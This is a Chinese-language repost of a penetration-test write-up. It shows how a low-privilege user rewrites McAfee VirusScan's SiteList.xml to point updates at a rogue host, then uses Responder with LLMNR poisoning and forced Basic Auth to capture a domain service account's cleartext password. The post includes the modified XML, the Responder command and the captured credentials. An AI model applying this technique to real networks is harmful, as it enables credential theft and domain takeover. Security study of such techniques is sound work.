利用McAfee SiteList.xml 获取域控制账号密码

前端之家收集整理的这篇文章主要介绍了利用McAfee SiteList.xml 获取域控制账号密码前端之家小编觉得挺不错的,现在分享给大家,也给大家做个参考。
From: https://www.92aq.com/2016/02/01/mcafee-sitelist-xml.html
原文:https://github.com/tfairane/HackStory/blob/master/McAfeePrivesc.md

在实习的时候进行的渗透测试,我发现一个很好的办法提升域用户权限. 我的工作机器上被安装了 McAfee Virusscan Enterprise 8.8 i,并且我只有一个低权限的账号.

Mcafee 有一个自定义功能的更新服务器,可以通过HTTP或SMB连接到这些服务器。. (C:\ProgramData\McAfee\Common Framework\) SiteList.xml 有一些有趣的信息和一些内部服务器名字 ...
<?xml version="1.0" encoding="UTF-8"?>
<ns:SiteLists xmlns:ns="naSiteList" Type="Client">
<SiteList Default="1" Name="SomeGUID">

<HttpSite Type="fallback" Name="McAfeeHttp" Order="26" Enabled="1" Local="0"
Server="update.nai.com:80">
<RelativePath>Products/CommonUpdater</RelativePath><UseAuth>0</UseAuth>
<UserName></UserName>
<Password Encrypted="1">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX</Password>
</HttpSite>

<UNCSite Type="repository" Name="Paris" Order="13" Server="paris001" Enabled="1" Local="0">
<ShareName>Repository$</ShareName><RelativePath></RelativePath><UseLoggedonUserAccount>0</UseLoggedonUserAccount>
<DomainName>companydomain</DomainName>
<UserName>McAfeeService</UserName>
<Password Encrypted="1">YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY</Password>
</UNCSite>

<UNCSite Type="repository" Name="Tokyo" Order="18" Server="tokyo000" Enabled="1" Local="0">
<ShareName>Repository$</ShareName><RelativePath></RelativePath><UseLoggedonUserAccount>0</UseLoggedonUserAccount>
<DomainName>companydomain</DomainName>
<UserName>McAfeeService</UserName>
<Password Encrypted="1">YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY</Password>
</UNCSite>

</SiteList></ns:SiteLists>

让我们看看 McAfeeService 用户有什么特权.
PS C:\Users\TAirane> net user McAfeeService /domain
The request will be processed at a domain controller for domain companydomain.

User name McAfeeService
Full Name McAfee ePO
Comment Service Account for ePO Replication
User's comment
Country/region code 000 (System Default)
Account activeYes
Account expires Never
Password last set 29/01/2007 16:03:12
Password expiresNever
Password changeable 29/01/2007 16:03:12
Password required Yes
User may change passwordYes

Workstations allowedAll
logon script
User profile
Home directory
Last logon29/01/2016 17:55:09

logon hours allowed All

Local Group Memberships *All Repository*Repository
Global Group memberships*Domain Services Account*Workstations Administrator
*Servers Administrator*Domain Users

The command completed successfully.

不幸的是这个 AV 使用了 GUI 密码,我不能编辑这个文件. 不过呢,我在我的虚拟机里重新下载了一份 McAfee 然后覆盖了工作机器上的 SiteList.xml.

在这个时候,我知道我已经块成功了. 我把文件修改成差不多下面这样, 然后我通过Responder来伪造返回一些HTTP请求..
<?xml version="1.0" encoding="UTF-8"?>
<ns:SiteLists xmlns:ns="naSiteList" Type="Client">
<SiteList Default="1" Name="SomeGUID">

<HttpSite Type="fallback" Name="PWNED!" Order="26" Enabled="1" Local="0"
Server="fuckingrandomserver:80">
<RelativePath>LICORNE</RelativePath><UseAuth>1</UseAuth>
<UserName>McAfeeService</UserName>
<Password Encrypted="1">YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY</Password>
</HttpSite>

</SiteList></ns:SiteLists>

我点击更新 McAfee 病毒库 并且开始了 Responder 程序.
root@kali:~/Tools/responder# python Responder.py -I eth0 --basic
__
.----.-----.-----.-----.-----.-----.--||.-----.----.
| _|-__|__ --|_|_| |_||-__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|

NBT-NS,LLMNR & MDNS Responder 2.3

Original work by Laurent Gaffie (lgaffie@trustwave.com)
To kill this script hit CRTL-C
...
[+] Poisoners:
LLMNR[ON]
NBT-NS [ON]
DNS/MDNS [ON]

[+] Servers:
HTTP server[ON]
HTTPS server [ON]
WPAD proxy [OFF]
SMB server [ON]
Kerberos server[ON]
sql server [ON]
FTP server [ON]
IMAP server[ON]
POP3 server[ON]
SMTP server[ON]
DNS server [ON]
LDAP server[ON]

[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE[ON]
Serving HTML [OFF]
Upstream Proxy [OFF]

[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth[OFF]
Force Basic Auth [ON]
Force LM downgrade [OFF]
Fingerprint hosts[OFF]

[+] Generic Options:
Responder NIC[eth0]
Responder IP [192.168.169.140]
Challenge set[1122334455667788]


[+] Listening for events...

[*] [LLMNR]Poisoned answer sent to 192.168.169.141 for name fuckingrandomserver

[HTTP] Basic Client : 192.168.169.141
[HTTP] Basic Username : McAfeeService
[HTTP] Basic Password : *\cool_its_a_strong_password/*

日了狗了,我拿到他了 ! 现在我拥有域控制权限了

Mission accomplished !

欢迎大家关注安全工具箱,每天都会发布实用有趣的安全工具
https://www.92aq.com
微博:
http://weibo.com/u/5824380435/ 微信

猜你在找的XML相关文章